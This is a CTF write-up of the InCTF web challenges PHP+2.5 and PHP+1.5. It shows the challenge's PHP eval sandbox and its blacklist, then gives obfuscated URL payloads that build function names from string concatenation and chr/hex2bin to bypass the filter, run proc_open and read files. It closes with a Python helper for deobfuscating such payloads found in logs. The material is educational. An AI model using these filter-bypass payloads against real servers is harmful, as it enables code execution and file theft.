I played InCTF as a member of zer0pts. We reached 22nd place with 2302 points. It was a very good CTF. Thanks to all the admins for holding such a great competition!
I solved PHP+1.5 and PHP+2.5 during the competition. Here is the writeup.
[Web 744points] PHP+2.5
The given URL evaluated our PHP code, with some restrictions: the code could not contain any defined function name, certain symbols and language constructs, and its length had to be shorter than 100 bytes. See the following script for the details.
<?php
$input = $_GET['input'];

function check(){
    global $input;
    foreach (get_defined_functions()['internal'] as $blacklisted) {
        if (preg_match ('/' . $blacklisted . '/im', $input)) {
            echo "Your input is blacklisted" . "<br>";
            return true;
            break;
        }
    }
    $blacklist = "exit|die|eval|\[|\]|\\\|\*|`|-|\+|~|\{|\}|\"|\'";
    if(preg_match("/$blacklist/i", $input)){
        echo "Do you really you need that?" . "<br>";
        return true;
    }
    unset($blacklist);
    if(strlen($input)>100){ #That is random no. I took ;)
        echo "This is getting really large input..." . "<br>";
        return true;
    }
    return false;
}

$thisfille=$_GET['thisfile'];
if(is_file($thisfille)){
    echo "You can't use inner file" . "<br>";
} else{
    if(file_exists($thisfille)){
        if(check()){
            echo "Naaah" . "<br>";
        }else{
            eval($input);
        }
    }else{
        echo "File doesn't exist" . "<br>";
    }
}

function iterate($ass){
    foreach($ass as $hole){
        echo "AssHole";
    }
}

highlight_file(__FILE__);
?>
At first, I got the phpinfo output with this payload: ?thisfile=/&input=$x=php.info;$x();
Because PHP treats an undefined constant as a string of its own name and supports variable functions, "php.info" becomes the string "phpinfo" and $x() calls phpinfo(), while the blacklist regex never sees the function name written out.
From the phpinfo output I found that some of the functions that execute commands or read from and write to files were disabled. However, proc_open and file were still enabled, so we could still execute arbitrary commands and read arbitrary files.
When I globbed the root directory (payload: /?thisfile=/&input=$x=ch.r;$d=va.$x(114).$x(95).dump;$g=glo.b;$d($g($x(47).$x(42))); which evaluates to var_dump(glob("/*"))), I saw a /readFile executable. We should execute this one.
I used chr, proc_open, hex2bin, file, and var_dump to get the flag: run /readFile>/tmp/x with proc_open, then read /tmp/x with file and print it with var_dump. My payloads are here.
- do proc_open("/r*>/tmp/x",[],$z);
  payload: ?thisfile=/&input=$x=c.hr;$f=proc.$x(95).open;$g=hex.$x(50).bin;$f($g($x(50).f722a3e2f746d702f78),array(),$z);
- do var_dump(file("/tmp/x"));
  payload: ?thisfile=/&input=$x=c.hr;$f=va.$x(114).$x(95).dump;$g=fil.e;$a=$x(47).tmp.$x(47).x;$f($g($a));
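If you find requests like these in an access log, it helps to fold them back into the plain PHP the server actually ran. The helper below is an added example of mine, not part of the original post: it applies the same rules the payloads rely on (a bare word is the string PHP gives an undefined constant, '.' concatenates, $variables are substituted, chr() and hex2bin() are evaluated) and renders every remaining call as code. It only understands the small PHP subset these payloads use, which is an assumption of this example.

```python
import re

TOKEN = re.compile(r'\$\w+|\w+|[().,;=]')  # $vars, bare words/numbers, punctuation

class Raw(str):
    """PHP code kept as-is: a call that is not folded, or an unresolved $variable."""
def render(arg):
    # Arguments that are code stay bare; resolved strings are shown quoted.
    return arg if isinstance(arg, Raw) or arg.isdigit() else f'"{arg}"'
def call(fn, args):
    # Fold chr()/hex2bin() to their string result; render any other call as code.
    if fn == 'chr':
        return chr(int(args[0]))
    if fn == 'hex2bin':
        return bytes.fromhex(args[0]).decode()
    return Raw(f"{fn}({', '.join(render(a) for a in args)})")

def deobfuscate(payload):
    """Return the plain PHP statements the obfuscated `input` parameter executes."""
    toks, env, stmts, pos = TOKEN.findall(payload), {}, [], 0
    def peek():
        return toks[pos] if pos < len(toks) else None
    def take():
        nonlocal pos; pos += 1; return toks[pos - 1]
    def expr():  # term ('.' term)* : PHP string concatenation
        parts = [term()]
        while peek() == '.':
            take(); parts.append(term())
        return parts[0] if len(parts) == 1 else ''.join(parts)
    def term():  # word | $var | callee(args)
        tok = take()
        # An undefined constant evaluates to its own name; a known $var is substituted.
        value = env.get(tok[1:], Raw(tok)) if tok.startswith('$') else tok
        if peek() != '(':
            return value
        take(); args = []
        while peek() != ')':
            args.append(expr())
            if peek() == ',': take()
        take()
        return call(value, args)
    while peek():
        if peek().startswith('$') and toks[pos + 1:pos + 2] == ['=']:
            name = take()[1:]; take()  # '$name' then '='
            env[name] = expr()
        else:
            stmts.append(str(expr()))
        if peek() == ';': take()
    return stmts
```

Running it on the phpinfo payload yields phpinfo(), and on the two payloads above it yields proc_open("/r*>/tmp/x", array(), $z) and var_dump(file("/tmp/x")).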
Got the result! FLAG: inctf{Getting_segmentation_fault is_fun}
Unintended solution :P
[Web 100points] PHP+1.5
Same as PHP+2.5.